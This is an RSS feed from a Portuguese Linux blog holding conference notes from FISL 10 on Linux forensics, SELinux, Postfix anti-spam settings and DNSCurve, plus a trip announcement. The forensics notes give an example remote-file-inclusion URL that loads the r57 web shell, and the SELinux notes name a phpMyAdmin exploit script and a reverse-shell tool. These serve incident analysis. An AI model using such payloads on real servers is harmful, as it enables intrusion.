<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Everlinux's Blog &#187; FISL</title>
	<atom:link href="http://everlinux.com/blog/tag/fisl/feed" rel="self" type="application/rss+xml" />
	<link>http://everlinux.com/blog</link>
	<description>Sempre vivendo, aprendendo e blogando... :)</description>
	<lastBuildDate>Fri, 30 Jul 2010 18:13:16 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>FISL 10 &#8211; Anotações</title>
		<link>http://everlinux.com/blog/2009/06/29/fisl-10-anotacoes</link>
		<comments>http://everlinux.com/blog/2009/06/29/fisl-10-anotacoes#comments</comments>
		<pubDate>Mon, 29 Jun 2009 23:47:40 +0000</pubDate>
		<dc:creator>Tiago Cruz</dc:creator>
				<category><![CDATA[FISL]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Nerd]]></category>
		<category><![CDATA[Segurança]]></category>
		<category><![CDATA[Dicas]]></category>
		<category><![CDATA[Forense]]></category>

		<guid isPermaLink="false">http://everlinux.com/blog/?p=490</guid>
		<description><![CDATA[Segue algumas anotações realizadas no FISL 10. Qualquer dia eu organizo isso melhor # Forense em Linux &#8211; http://eriberto.pro.br - Insert Linux Live CD Forense ~ 60 MB. - Usar Sleuthkit &#8211; http://www.sleuthkit.org/sleuthkit/ - Usar ls -lua e ls -lta para ver a data de modificação dos arquivos - Montar dump de imagem com &#8220;RO&#8221; [...]]]></description>
			<content:encoded><![CDATA[<p>Segue algumas anotações realizadas no FISL 10. Qualquer dia eu organizo isso melhor <img src='http://everlinux.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><strong># Forense em Linux &#8211; <a href="http://eriberto.pro.br">http://eriberto.pro.br</a></strong><br />
- Insert Linux Live CD Forense ~ 60 MB.<br />
- Usar Sleuthkit &#8211; http://www.sleuthkit.org/sleuthkit/<br />
- Usar ls -lua e ls -lta para ver a data de modificação dos arquivos<br />
- Montar dump de imagem com &#8220;RO&#8221; e nunca passar fsck<br />
- chkrootkit -r /forense<br />
- rkhunter -c -r /forense<br />
- freshclam; clamav -r /forense<br />
- Usar strings + grep por data (apache) ou comandos (rm) em dd de disco/mem<br />
- find /forense -mtime -2 => arquivos suspeitos alterados recentemente<br />
- fopen de URL no PHP pode permitir download de um arquivo para o /var/tmp<br />
- site.com/lalala?http://shellremota.com/r57.php<br />
- r57.php te dá uma shell remota (push com resposta 200 nos logs &#8211; OK)</p>
<p><em> The Sleuth Kit (previously known as TASK) is a collection of UNIX-based<br />
 command line file system and media management forensic analysis tools.<br />
 The file system tools allow you to examine file systems of a suspect<br />
 computer in a non-intrusive fashion. Because the tools do not rely on<br />
 the operating system to process the file systems, deleted and hidden<br />
 content is shown.</em></p>
<p><strong># KVM &#8211; glommer AT redhat.com</strong><br />
- Sw virtual?<br />
- GFS?<br />
- guestfish = disaster recovery en VM (editar menu.lst e etc)</p>
<p><strong># Varnish &#8211; Squid like globo.com</strong><br />
- Usar o webpoligraph para gerar stress stest/ analise de resultados</p>
<p><strong># Selinux &#8211; jczucco AT gmail.com</strong><br />
- <a href="http://jczucco.blogspot.com/ ">http://jczucco.blogspot.com/ </a>e <a href="http://ulissescastro.wordpress.com/">http://ulissescastro.wordpress.com/</a><br />
- type_t = template para apache, mysql e etc<br />
- setenforce 1; sestatus<br />
- exploit no phpmyadmin &#8211; phpmyadminrce.sh<br />
- backconnect &#8211; bc.pl para abrir conexão reversa</p>
<p><strong># Miguel Ciurcio Filho &#8211; <a href="http://www.ic.unicamp.br/~miguel">http://www.ic.unicamp.br/~miguel</a></strong><br />
- HELO com IP deve ser negado, embora tenha RFC dizendo o contrário<br />
- PTR e A register must match<br />
- smtpd_client_connection_rate_limit = 15<br />
- smtpd_client_connection_count_limit = 10<br />
- smtpd_client_message_rate_limit = 25<br />
- Usar somente a SpamHaus (best ever)<br />
- smtpd_hard_error_limit = 3<br />
- smtpd_soft_error_limit = 1<br />
- smtpd_error_sleep_time = 20s<br />
- FDQN com nome da máquina não vale</p>
<p><strong># DNS Curve &#8211; D.J. Bernstein</strong><br />
- High-Speed with Cryptography<br />
- Sourceforce uses nginex<br />
- Criptografia https difícil e lenta<br />
- Would massively overload servers<br />
- Confidentiality despite Espionage<br />
- Integrity despite Corruption<br />
- Availability despite Sabotage<br />
- Uses 4096 bit encryption / signatures<br />
- 50 bilion packet/day to 500 milion cliets with 2.4 Core 2 Quad<br />
- Total load on .com:<br />
- 38 bilion packet/day from 5 milion clients<br />
- Crypto per group not per query<br />
- DNSSEC uses 640-1024 bit RSA for fast signature verification<br />
- DNSSEC on *.sec2.br foi quebrado 23/26 domínios &#8220;protegidos&#8221;</p>
]]></content:encoded>
			<wfw:commentRss>http://everlinux.com/blog/2009/06/29/fisl-10-anotacoes/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>10º Fórum Internacional de Software Livre</title>
		<link>http://everlinux.com/blog/2009/06/23/10-forum-internacional-de-software-livre</link>
		<comments>http://everlinux.com/blog/2009/06/23/10-forum-internacional-de-software-livre#comments</comments>
		<pubDate>Tue, 23 Jun 2009 18:10:04 +0000</pubDate>
		<dc:creator>Tiago Cruz</dc:creator>
				<category><![CDATA[FISL]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Nerd]]></category>

		<guid isPermaLink="false">http://everlinux.com/blog/?p=482</guid>
		<description><![CDATA[Mantendo a tradição, estamos indo novamente ao 10º FISL, em Porto Alegre Como sempre, deixando tudo para a última hora&#8230; pegando os vôos mais bizarros e hospedando-se nos hotéis mais estranhos :-p Ainda preciso mitigar o restante do dia de trabalho, passar minhas tarefas para os que ficam, fazer as malas e atravessar a cidade [...]]]></description>
			<content:encoded><![CDATA[<p>Mantendo a tradição, estamos indo novamente ao 10º FISL, em Porto Alegre <img src='http://everlinux.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>Como sempre, deixando tudo para a última hora&#8230; pegando os vôos mais bizarros e hospedando-se nos hotéis mais estranhos :-p</p>
<p>Ainda preciso mitigar o restante do dia de trabalho, passar minhas tarefas para os que ficam, fazer as malas e atravessar a cidade para o Aeroporto de Guarulhos&#8230; As vezes eu me pergunto porque eu ainda faço isso tudo, somente para não perder a festa da padroeira dos Nerds :-p</p>
<p>Dê uma olhada na <a href="http://fisl.softwarelivre.org/10/papers/pub/">programação</a> e venha assistir palestras como essas:</p>
<ul>
The DNS security mess<br />
DNSCurve X DNSSEC<br />
Forense computacional em Linux<br />
Projeto de lei de cibercrimes<br />
Configurações práticas IPv6 no Linux e FreeBSD &#8211; Firewall, Túneis, DNS e outros serviços<br />
DDOS – ataques e prevenções<br />
Tecnicas Avançadas de Segurança com Iptables<br />
SELinux For Everyday SysAdmins<br />
Usando ntop+Kernel Bridging p/ Análise e Caracterização de Tráfego
</ul>
<p>A gente se encontra lá!!!</p>
]]></content:encoded>
			<wfw:commentRss>http://everlinux.com/blog/2009/06/23/10-forum-internacional-de-software-livre/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<!-- This Quick Cache file was built for (  everlinux.com/blog/tag/fisl/feed ) in 0.46820 seconds, on Jul 30th, 2010 at 8:34 pm UTC. -->
<!-- This Quick Cache file will automatically expire ( and be re-built automatically ) on Jul 30th, 2010 at 9:34 pm UTC -->